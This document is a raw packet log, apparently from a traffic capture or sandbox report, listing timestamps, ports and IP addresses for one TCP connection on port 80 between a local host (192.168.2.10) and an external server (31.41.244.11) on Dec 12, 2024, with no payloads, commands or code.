Dec 12, 2024 16:48:24.878694057 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.878737926 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.881181955 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.881242990 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.881263018 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.882715940 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.883737087 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.883785009 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.883889914 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.886337042 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.886383057 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.886406898 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.886511087 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.889272928 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.889324903 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.889332056 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.889369011 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.891489029 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.891547918 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.891601086 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.891777992 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.894067049 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.894103050 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.894119024 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.894140005 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.896676064 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.896723032 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.896832943 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.896878004 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.898524046 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.898574114 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.898648977 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.898705006 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.900489092 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.900537014 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.900677919 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.900722027 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.902271032 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.902283907 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.902323961 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.902338982 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.904112101 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.904181957 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.904300928 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.904831886 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.905987978 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.906130075 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.906183004 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.907910109 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.907968044 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.907995939 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.908039093 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.909679890 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.909740925 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.909822941 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.909864902 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.911505938 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.911582947 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.911649942 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.912307024 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.913418055 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.913495064 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.913511992 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.913762093 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.915215969 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.915339947 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.915399075 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.917069912 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.917154074 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.917165041 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.917207956 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.918950081 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.919008017 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.919078112 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.919464111 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.920851946 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.920891047 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.920942068 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.920994997 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.922662020 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.922745943 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.922871113 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.923557997 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.924478054 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.924530029 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.924535036 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.924568892 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.926381111 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.926420927 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.926434994 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.926459074 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.928219080 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.928287983 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.928316116 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.931530952 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.033556938 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.033623934 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.033629894 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.033679008 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.034369946 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.034405947 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.034426928 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.034441948 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.035573006 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.035706997 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.035752058 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.037195921 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.037247896 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.037379980 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.038777113 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.038815022 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.038851976 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.039534092 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.040374041 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.040417910 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.040441990 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.040482044 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.041939020 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.041980028 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.042151928 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.042192936 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.043504953 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.043566942 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.043699026 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.043744087 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.044950962 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.044995070 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.045051098 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.045092106 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.046458960 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.046498060 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.046523094 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.046564102 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.047955990 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.047996998 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.048008919 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.048038960 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.049479961 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.049530983 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.049684048 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.050931931 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.050975084 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.051000118 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.051542997 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.052241087 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.052326918 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.052364111 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.052392960 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.053723097 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.053771019 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.053848028 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.053893089 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.055069923 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.055120945 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.055212021 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.055512905 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.056479931 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.056525946 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.056602001 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.056643963 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.057955027 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.057998896 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.058065891 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.058105946 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.059514046 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.059560061 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.059700966 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.059741974 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.060966969 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.061013937 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.061074972 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.061116934 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.062247992 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.062326908 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.062346935 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.062386990 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.063633919 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.063694954 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.063736916 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.063930988 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.065057039 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.065166950 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.065212965 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.066483974 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.066507101 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.066557884 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.067902088 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.067964077 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.068003893 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.068036079 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.069389105 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.069442987 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.069617033 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.069660902 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.070879936 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.070926905 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.070976973 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.072221041 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.072338104 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.072348118 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.072590113 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.073709011 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.073811054 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.073834896 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.073858023 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.075033903 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.075103998 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.075110912 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.075262070 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.076447010 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.076497078 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.076543093 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.076642990 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.077872038 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.078057051 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.078097105 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.079325914 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.079374075 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.079441071 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.079575062 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.080774069 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.080893040 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.080935001 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.082175970 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.082256079 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.082339048 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.082479954 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.083808899 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.083858013 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.083946943 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.083983898 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.085191011 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.085239887 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.085304976 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.085495949 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.086457968 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.086504936 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.086514950 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.086580038 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.087893963 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.087934971 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.088016987 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.088052034 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.089308977 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.089350939 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.089425087 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.089457035 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.090714931 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.090755939 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.090815067 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.090879917 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.092196941 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.092240095 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.092364073 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.092402935 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.093549967 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.093600988 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.093683958 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.093791008 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.094969034 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.095019102 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.095071077 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.095175028 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.096389055 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.096437931 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.096472979 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.096546888 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.097841024 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.097902060 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.097932100 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.097968102 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.099318981 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.099374056 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.099384069 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.099416971 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.100681067 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.100728035 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.100783110 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.101381063 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.102092028 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.102133989 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.102169037 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.102206945 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.103517056 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.103570938 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.103636026 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.104127884 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.105067015 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.105120897 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.105170965 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.105206013 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.106394053 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.106404066 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.106439114 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.225677967 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.225735903 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.225789070 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.225831032 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.226300955 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.226351976 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.226371050 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.226413965 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.227480888 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.227535009 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.227612972 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.227655888 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.228722095 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.228770971 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.228858948 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.228904963 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.229999065 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.230046988 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.230099916 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.230148077 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.231125116 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.231172085 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.231334925 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.231379032 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.232300043 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.232343912 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.232487917 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.232543945 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.233556032 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.233617067 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.233637094 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.233685970 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.234777927 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.234822035 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.234945059 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.235101938 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.235956907 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.236006021 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.236040115 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.236095905 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.237111092 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.237160921 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.237194061 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.237237930 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:25.238296032 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:25.238343954 CET	49890	80	192.168.2.10	31.41.244.11
